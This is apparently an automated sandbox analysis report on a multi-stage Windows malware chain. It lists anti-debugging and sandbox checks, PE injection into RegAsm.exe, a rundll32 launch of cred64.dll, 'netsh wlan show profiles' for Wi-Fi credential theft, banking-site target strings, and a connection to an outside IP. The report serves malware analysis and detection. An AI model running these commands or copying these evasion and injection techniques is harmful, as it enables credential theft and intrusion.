                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: MPGPH131.exe, 00000013.00000003.2358561956.00000000085AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}cGVhZm1tZ2RwZmtvZ2tnaGNwaWhh2j4FMS4yLjDgPtDD9agG6D4A6D4G6D4L8D7Qw/WoBsoBWggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgAeACAAQDIPgPSPiBtaGpmYm1kZ2NmamJicGFlb2pvZm9ob2VmZ2llaGphado+ATHgPtDD9agG6D4A8D7Qw/WoBsoBXggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgCeACAAQDIPgPSPiBuY2JqZWxwamNoa3BiaWticGtjY2hraGtibG9kb2FtYdo+BTIuMC4y4D7Qw/WoBug+APA+0MP1qAbKAV8IARAFGAIgACgAMAA4AEAASABQAFgAYABoAngAgAEAyD4D0j4gbmtlaW1ob2dqZHBucGNjb29mcGxpaW1hYWhtYWFvbWXaPgYxLjMuMjHgPtDD9agG6D4A8D7Qw/WoBvgBsiiAAv///////////wGIAgGoAoQXsgIQd6OHVV3LMHKvjeie9v2i18o+1wcKBAgAEAASEgoCCAMSAggIGgIIASIECAAQARoPCg1ub19lbnYtbm9fdmVyIgIIAjJiCAAaLDQ3REVRcGo4SEJTYSsvVEltVys1SkNldVFlUmttNU5NcEpXWkczaFN1RlU9Ii4icFpMaFRhSjIzaE41dVF4d3p1MEsyQ1llcy9kdkp1RTkzVmJJVlYvTG5SQT0iKgA6Cwjz///v9/////8BQikSCjEuMy4xNzcuMTEYBSAAKg5SZWdLZXlOb3RGb3VuZDIHd2luZG93c1ICCAFa/AUJdZMYBFaWU0AR3SQGgZVTRkAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8ZAAAAAAAAAAAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8yFQiH9N6X29eyvKYBEggIABABIJCABDISCNvpsoebrM36GRIGCAAQASAQMhII++qnh8mYwYhfEgYIABABIBAyEgjozNnlpJyeyzkSBggAEAEgEDITCOC54qSdyuvjjgESBggAEAEgEDISCNn9xMr9td2KbRIGCAAQASAQMhIIgteJ4NSXj9E2EgYIABABIBAyEgjmzv2twIj8gn4SBggAEAEgEDIUCKfHy9mkub6BwwESBwgBEAEgkGAyFQiauYjc7KfS3OEBEggIABABIJCABDITCJnwsYm4+NWOLBIHCAEQASCQYDIUCNHJvLvV2cza5wESBwgBEAEgkGAyEwiQrNz7jbLTpQwSBwgBEAEgkGAyEgjVuuKf55342XkSBggAEAEgEDITCPeTqZiGj5aaSRIHCAEQASCQYDISCLPMhM/6sZX2NRIGCAAQASAQMhIIh6SA76Kw0u9WEgYIABABIBAyEwjcx7n5qNnem6MBEgYIABABIBAyFAjKvKW5jY/Wx+cBEgcIARABIJBgMhQIwqf5grzUgKTqARIHCAEQASCQYDIWCJiYntn49dXkggESCQgAEAEggICACDITCMuAzLDq3NSUzwESBggAEAEgEDITCIS9vZeNgI79kgESBggAEAEgEDITCP7Mx9PU/OC9iQESBggAEAEgEDISCNKq8/iqnu6OFRIGCAAQASAQMhQImuHa5M/ohPHnARIHCAEQASCQYHoCCACCAQIYAA==I24SSJlGLqoRv2J'
                                Source: b3168c3d9b.exe, 00000004.00000002.2415455709.00000000010E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qc
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: file.exe, 00000000.00000002.2026963565.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, explorta.exe, 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp, explorta.exe, 00000003.00000002.2067305894.0000000000791000.00000040.00000001.01000000.00000007.sdmp, 2531414c80.exe, 00000008.00000002.2507620764.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2498548418.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000002.2531990247.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, 2531414c80.exe, 00000018.00000002.2403608510.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, amert.exe, 0000001A.00000002.2452955674.0000000000A5E000.00000040.00000001.01000000.0000000E.sdmp, RageMP131.exe, 0000001F.00000002.2448644551.000000000106D000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: MPGPH131.exe, 00000014.00000003.2354076459.00000000079EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Found API chain indicative of debugger detection
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_4-97330
                                Hides threads from debuggers
                                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeThread information set: HideFromDebugger
                                Potentially malicious time measurement code found
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_051502BB Start: 05150AAE End: 051503408_2_051502BB
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile opened: SIWVID
                                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPortJump to behavior
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess queried: DebugPort
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05560D2E rdtsc 0_2_05560D2E
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014EAA2 BlockInput,4_2_0014EAA2
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00102622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00102622
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_000D42DE
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005C5D0B mov eax, dword ptr fs:[00000030h]2_2_005C5D0B
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005C9A72 mov eax, dword ptr fs:[00000030h]2_2_005C9A72
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F4CE8 mov eax, dword ptr fs:[00000030h]4_2_000F4CE8
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00834130 mov eax, dword ptr fs:[00000030h]8_2_00834130
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_00801A60 mov eax, dword ptr fs:[00000030h]8_2_00801A60
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00130B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_00130B62
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00102622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00102622
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000F083F
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F09D5 SetUnhandledExceptionFilter,4_2_000F09D5
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000F0C21
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Benign windows process drops PE files
                                Source: C:\Windows\System32\svchost.exeFile created: BIT1659.tmp.6.drJump to dropped file
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\rundll32.exeNetwork Connect: 193.233.132.167 80
                                Allocates memory in foreign processes
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                                Injects a PE file into a foreign processes
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                                Writes to foreign memory regions
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 447000
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1154008
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00131201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_00131201
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_00596E30 ShellExecuteA,Sleep,CreateThread,Sleep,2_2_00596E30
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013B226 SendInput,keybd_event,4_2_0013B226
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,4_2_001522DA
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe "C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe "C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe "C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exe "C:\Users\user\AppData\Local\Temp\1000012001\amert.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00130B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,4_2_00130B62
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00131663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_00131663
                                Source: b3168c3d9b.exe, 00000004.00000000.2070491358.0000000000192000.00000002.00000001.01000000.00000009.sdmp, b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                                Source: explorta.exe, explorta.exe, 00000003.00000002.2067305894.0000000000791000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                                Source: b3168c3d9b.exeBinary or memory string: Shell_TrayWnd
                                Source: 2531414c80.exe, 2531414c80.exe, 00000008.00000002.2507620764.0000000000A8D000.00000040.00000001.01000000.0000000C.sdmp, MPGPH131.exe, 00000013.00000002.2498548418.00000000011FD000.00000040.00000001.01000000.0000000D.sdmp, MPGPH131.exe, 00000014.00000002.2531990247.00000000011FD000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: /HProgram Manager
                                Source: amert.exe, 0000001A.00000002.2452955674.0000000000A5E000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: twProgram Manager
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005ACBC7 cpuid 2_2_005ACBC7
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
